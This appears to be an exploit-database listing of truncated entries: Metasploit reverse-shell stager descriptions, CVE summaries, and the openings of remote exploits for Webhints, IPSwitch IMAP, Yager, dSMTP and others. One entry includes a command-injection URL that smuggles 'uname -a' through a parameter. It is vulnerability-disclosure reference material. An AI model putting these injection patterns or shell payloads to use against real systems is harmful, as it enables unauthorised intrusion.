Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)

Spawn a piped command shell staged. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 93 include Msf::Payload::Stager include Msf::Payload::Windows def...

Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)

Inject the Meterpreter server DLL via the Reflective Dll Injection payload staged. Requires Windows XP SP2 or newer. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule...

Windows Command Shell, Reverse TCP Inline

Connect back to attacker and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 324 include Msf::Payload::Windows include Msf::Payload::Single include...

CVE-2001-1488

Open Projects Network Internet Relay Chat IRC daemon u2.10.05.18 does not perform a double-reverse DNS lookup, which allows remote attackers to spoof any valid hostname on the Internet. NOTE: a followup post suggests that this is not an issue in the daemon...

Webhints <= 1.03 Remote Command Execution Exploit (perl code) (3)

!/usr/bin/perl -w emanuele@blackbox:$ perl M4DR007-hints.pl www.madroot.edu.ms Security Group WebHints Software hints.cgi Remote Command Execution Vulnerability Affected version: = all code by MadSheep 06.11.2005 hostname: localhost port: default: 80 80 path: /cgi-bin/ /cgi-bin/ your ip for rever...

Webhints 1.03 - Remote Command Execution (Perl) (3)

!/usr/bin/perl -w emanuele@blackbox:$ perl M4DR007-hints.pl www.madroot.edu.ms Security Group WebHints Software hints.cgi Remote Command Execution Vulnerability Affected version: = all code by MadSheep 06.11.2005 hostname: localhost port: default: 80 80 path: /cgi-bin/ /cgi-bin/ your ip for rever...

IPSwitch IMAP Server - LOGON Remote Stack Overflow

IPSwitch IMAP Server - LOGON Remote Stack Overflow / IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written by nolimit and BuzzDee First, some information for the few of you that know how this stuff works. The reason you see no SP2 or 2003 offsets is because o...

IPSwitch IMAP Server LOGON Remote Stack Overflow

No description provided by source. / IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written by nolimit and BuzzDee First, some information for the few of you that know how this stuff works. The reason you see no SP2 or 2003 offsets is because of Windows SEH...

IPSwitch IMAP Server LOGON Remote Stack Overflow

Exploit for unknown platform in category remote exploits ================================================ IPSwitch IMAP Server LOGON Remote Stack Overflow ================================================ / IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written...

IPSwitch IMAP Server - LOGON Remote Stack Overflow

/ IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written by nolimit and BuzzDee First, some information for the few of you that know how this stuff works. The reason you see no SP2 or 2003 offsets is because of Windows SEH checks. Thats right, in this one...

yager524.txt

/ Yager 1 -- sending handshake UDP...done! -- reading server response UDP...done! -- server port: 1089 -- connecting to 192.168.2.100:1089 TCP...done! -- exploiting WinXP Pro SP1 GER -- ret: 0x300686bd jmp esp in binkw32.dll -- exploiting packet overflow... -- sending packet...done! -- starting...

Exim <= 4.41 dns_build_reverse Local Exploit

No description provided by source. / ripped straight off iDEFENSE advisory - so lazy I just picked up GDB... bored on a weeknight : nothing to write home to mother about due to the fact that you need a local user account on a server and all you get is to read other people's emails .... not even m...

CVE-2005-1613

Cross-site scripting XSS vulnerability in member.php in Open Bulletin Board OpenBB 1.0.8 allows remote attackers to inject arbitrary web script or HTML via the reverse parameter in a list action...

CVE-2005-1613

Cross-site scripting XSS vulnerability in member.php in Open Bulletin Board OpenBB 1.0.8 allows remote attackers to inject arbitrary web script or HTML via the reverse parameter in a list action...

dSMTP Mail Server 3.1b (Linux) - Format String

/ dSMTP - SMTP Mail Server 3.1b Linux Remote Root Format String Exploit cybertronicatgmxdotnet 05/05/2005 This exploits the "xtellmail" command! bindc0de breaks somehow, cb works fine! remote buffer space is about 256 bytes bad chars: 0x00, 0x20, 0x0a and prolly more NOTE: before you start, chang...

Yager 5.24 - Remote Buffer Overflow

Yager 5.24 - Remote Buffer Overflow / Yager 1 -- sending handshake UDP...done! -- reading server response UDP...done! -- server port: 1089 -- connecting to 192.168.2.100:1089 TCP...done! -- exploiting WinXP Pro SP1 GER -- ret: 0x300686bd jmp esp in binkw32.dll -- exploiting packet overflow... --...

E-Cart 1.1 - index.cgi Remote Command Execution

E-Cart 1.1 - index.cgi Remote Command Execution !/usr/bin/perl Example added if code doesn't work for ya: http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductoresdvd&art=reproductordvp-ns315.dat|uname%20-a| /str0ke info: [email protected] use IO::Socket; print "\n\n www.badroot.org...

Yager <= 5.24 Remote Buffer Overflow Exploit

No description provided by source. / Yager = 5.24 Remote Buffer Overflow Exploit cybertronicatgmxdotnet 04/25/2005 send all the money to Luigi Auriemma / / / / / / / / / / / / / / / / / / / // // / // / / / / // / / // / / / / / / /, /./// // // //// // -- exploit by : cybertronic -...

Yager 5.24 - Remote Buffer Overflow

/ Yager 1 -- sending handshake UDP...done! -- reading server response UDP...done! -- server port: 1089 -- connecting to 192.168.2.100:1089 TCP...done! -- exploiting WinXP Pro SP1 GER -- ret: 0x300686bd jmp esp in binkw32.dll -- exploiting packet overflow... -- sending packet...done! -- starting...

PMSoftware Simple Web Server - GET Remote Buffer Overflow

PMSoftware Simple Web Server - GET Remote Buffer Overflow / PMSoftware Simple Web Server Buffer Overflow Exploit 3 targets cybertronicatgmxdotnet 04/25/2005 / / / / / / / / / / / / / / / / / / / // // / // / / / / // / / // / / / / / / /, /./// // // //// // -- exploit by : cybertronic -...